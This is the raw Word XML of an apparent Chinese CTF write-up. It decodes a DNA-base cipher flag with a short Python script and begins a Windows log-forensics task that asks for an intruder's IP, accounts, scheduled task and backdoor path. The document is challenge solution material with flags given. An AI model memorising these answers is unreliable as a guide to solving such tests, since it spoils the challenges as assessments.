          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（还是群里的师傅给我的灵感）</w:t>
      </w:r>
      <w:r w:rsidR="00B574E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="000918D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r w:rsidR="00C51CFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>问谁是渣男</w:t>
      </w:r>
      <w:r w:rsidR="009A2B26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，而文本名提示树木是渣男</w:t>
      </w:r>
      <w:r w:rsidR="005C7F55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00533EAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>因此秘</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00533EAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00533EAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00533EAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>shumu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D10D0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00D10D0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>继续</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D10D0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>puzzlesolver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D10D0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>一把</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D10D0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>梭</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34183059" w14:textId="2F28BEC2" w:rsidR="004D7C3C" w:rsidRPr="00D10D0D" w:rsidRDefault="004D7C3C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A132EF7" w14:textId="7BDDBDA7" w:rsidR="007225C1" w:rsidRDefault="007225C1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007225C1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04C1BBDD" wp14:editId="6B6A87FF">
            <wp:extent cx="5274310" cy="2372995"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="260788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88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0451" w14:textId="77777777" w:rsidR="00420B4E" w:rsidRDefault="00420B4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BF128A" w14:textId="7D0D15D5" w:rsidR="00420B4E" w:rsidRPr="001712F7" w:rsidRDefault="00420B4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>GTAGAGCTAGTCCTT{GGGTCACGGTTC_GGGTCACGGTTC_GAACGGTTC_GTAGTG_GCTTCA_GTAGACGTGGCGGTG_GTAGACTCA_TATGACCGG_GCTCGGGCT}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102144D8" w14:textId="57C9A1DD" w:rsidR="00B061B6" w:rsidRDefault="00B061B6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001712F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>根据文件名猜测</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001712F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00ED6E9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
      <w:r w:rsidR="00594FB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，找了好多个不同的编码规则</w:t>
      </w:r>
      <w:r w:rsidR="005C6533">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，最后找到这个</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00711E87" w:rsidRPr="00F8263C">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidR="00711E87" w:rsidRPr="00F8263C">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>ttps://github.com/karma9874/DNA-Cipher-Script-CTF</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A38AAB2" w14:textId="1D1FA568" w:rsidR="00711E87" w:rsidRDefault="00711E87">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711E87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6219463E" wp14:editId="1B26E77E">
            <wp:extent cx="5274310" cy="3561715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="10110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8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D73" w14:textId="700CCF6D" w:rsidR="007757D0" w:rsidRDefault="007757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五个刚好是S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ICTF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00E8102E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:r w:rsidR="0016622E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，发现不会用</w:t>
      </w:r>
      <w:r w:rsidR="006D63FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，只好看源码</w:t>
      </w:r>
      <w:r w:rsidR="00D44A02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，写个解密脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A47C7FA" w14:textId="77777777" w:rsidR="008D6686" w:rsidRDefault="008D6686">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64088875" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t>mapping = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3667E817" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t>'AAA': 'a', 'AAC': 'b', 'AAG': 'c', 'AAT': 'd', 'ACA': 'e', 'ACC': 'f', 'ACG': 'g', 'ACT': 'h', 'AGA': '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3F904C" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t>'AGC': 'j', 'AGG': 'k', 'AGT': 'l', 'ATA': 'm', 'ATC': 'n', 'ATG': 'o', 'ATT': 'p', 'CAA': 'q', 'CAC': 'r',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608F9A8F" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t>'CAG': 's', 'CAT': 't', 'CCA': 'u', 'CCC': 'v', 'CCG': 'w', 'CCT': 'x', 'CGA': 'y', 'CGC': 'z', 'CGG': 'A',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00294FD2" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t>'CGT': 'B', 'CTA': 'C', 'CTC': 'D', 'CTG': 'E', 'CTT': 'F', 'GAA': 'G', 'GAC': 'H', 'GAG': 'I', 'GAT': 'J',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE7E608" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t>'GCA': 'K', 'GCC': 'L', 'GCG': 'M', 'GCT': 'N', 'GGA': 'O', 'GGC': 'P', 'GGG': 'Q', 'GGT': 'R', 'GTA': 'S',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70AA56" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t>'GTC': 'T', 'GTG': 'U', 'GTT': 'V', 'TAA': 'W', 'TAC': 'X', 'TAG': 'Y', 'TAT': 'Z', 'TCA': '1', 'TCC': '2',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F43568B" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t>'TCG': '3', 'TCT': '4', 'TGA': '5', 'TGC': '6', 'TGG': '7', 'TGT': '8', 'TTA': '9', 'TTC': '0', 'TTG': ' ',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C0045" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t>'TTT': '.'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35830E97" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686"/>
    <w:p w14:paraId="7FD3812E" w14:textId="5E09C308" w:rsidR="008D6686" w:rsidRPr="005A0E61" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D6686">
        <w:t>input = '</w:t>
      </w:r>
      <w:r w:rsidR="00B867E8" w:rsidRPr="00B867E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B867E8">
        <w:t>GTAGAGCTAGTCCTT{GGGTCACGGTTC_GGGTCACGGTTC_GAACGGTTC_GTAGTG_GCTTCA_GTAGACGTGGCGGTG_GTAGACTCA_TATGACCGG_GCTCGGGCT}</w:t>
      </w:r>
      <w:r w:rsidRPr="008D6686">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700FC91B" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686"/>
    <w:p w14:paraId="28A2F357" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5E250E" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>ans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC03266" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve"> &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>(input):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A4242" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve">    if input[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>] in ('{', '_', '}'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AC913B" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>ans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve"> += input[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C4134" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve"> += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406E2748" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE5C242" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>ans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve"> += </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>mapping[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>input[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>i:i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve"> + 3]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755A344B" w14:textId="77777777" w:rsidR="008D6686" w:rsidRPr="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t xml:space="preserve"> += 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408A51ED" w14:textId="209504AE" w:rsidR="008D6686" w:rsidRDefault="008D6686" w:rsidP="008D6686">
      <w:r w:rsidRPr="008D6686">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>ans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6686">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C94B4" w14:textId="77777777" w:rsidR="000B1C20" w:rsidRDefault="000B1C20" w:rsidP="008D6686"/>
    <w:p w14:paraId="3CE48304" w14:textId="1A6A989E" w:rsidR="000B1C20" w:rsidRDefault="00FC372E" w:rsidP="008D6686">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC372E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="066DABFC" wp14:editId="386B9A12">
            <wp:extent cx="3791145" cy="654084"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="70699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98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4759" w14:textId="37E809E6" w:rsidR="00B77C5C" w:rsidRDefault="00B77C5C" w:rsidP="008D6686">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B77C5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SICTF{Q1A0_Q1A0_GA0_SU_N1_SHUMU_SH1_ZHA_NAN}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FF9814" w14:textId="77777777" w:rsidR="00646C02" w:rsidRDefault="00646C02" w:rsidP="008D6686">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E2FEE5" w14:textId="77777777" w:rsidR="001B452F" w:rsidRDefault="001B452F" w:rsidP="001B452F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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
        </w:rPr>
        <w:t>日志分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352E7325" w14:textId="39398E2B" w:rsidR="00646C02" w:rsidRDefault="00771378" w:rsidP="008D66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次做日志，现</w:t>
      </w:r>
      <w:r w:rsidR="00220A65">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>看现做</w:t>
      </w:r>
      <w:r w:rsidR="00814D73">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="002A147D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA318D2" w14:textId="694D0B56" w:rsidR="00734F7D" w:rsidRDefault="0088432D" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723C4B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>黑客所接入的IP地址|黑客所创建的用户名|黑客所加入的用户组|黑客创建的计划名|创建计划任务的对象后门所处的路径（小写盘符......,后门路径精确到****.exe）|黑客远程登陆RDP的账户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E12FF3" w14:textId="77777777" w:rsidR="00F82873" w:rsidRDefault="00F82873" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F7779E" w14:textId="1F4273DD" w:rsidR="00894BEC" w:rsidRDefault="005F656B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个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我是和远程登录做的</w:t>
      </w:r>
      <w:r w:rsidR="00B106BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，筛选事件I</w:t>
      </w:r>
      <w:r w:rsidR="00B106BF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>D4648</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD6BACC" w14:textId="6C5ED34B" w:rsidR="00CA168A" w:rsidRDefault="00852DF1" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00852DF1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CDCE487" wp14:editId="1715ECF5">
            <wp:extent cx="5274310" cy="2827655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1462524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4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CAA" w14:textId="46863E41" w:rsidR="00F82873" w:rsidRDefault="00E278EF" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E278EF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="270F0F11" wp14:editId="68637F8D">
            <wp:extent cx="5274310" cy="2661285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="467579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798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EF1" w14:textId="3B23A697" w:rsidR="00DF59AE" w:rsidRDefault="00DF59AE" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF59AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61BAC0C1" wp14:editId="65BCC727">
            <wp:extent cx="5274310" cy="2810510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="86469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0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42E" w14:textId="4D205482" w:rsidR="00EA2B45" w:rsidRDefault="00EA2B45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该只有这三个和hacker</w:t>
      </w:r>
      <w:r w:rsidR="009233DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，我是一个个翻的</w:t>
      </w:r>
      <w:r w:rsidR="00F22C58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（最后一步做的这两个，翻的巨快</w:t>
      </w:r>
      <w:r w:rsidR="001B0968">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，看name就直接过</w:t>
      </w:r>
      <w:r w:rsidR="00F22C58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B8E91E" w14:textId="270AD293" w:rsidR="0062767C" w:rsidRDefault="0062767C" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062767C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="653D1429" wp14:editId="40EA5089">
            <wp:extent cx="5274310" cy="3068955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="252054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45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F4C" w14:textId="5D038741" w:rsidR="003B4C70" w:rsidRDefault="00342922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到</w:t>
      </w:r>
      <w:r w:rsidR="00A75ECE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>接入I</w:t>
      </w:r>
      <w:r w:rsidR="00A75ECE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00A75ECE" w:rsidRPr="00BD6445">
        <w:rPr>
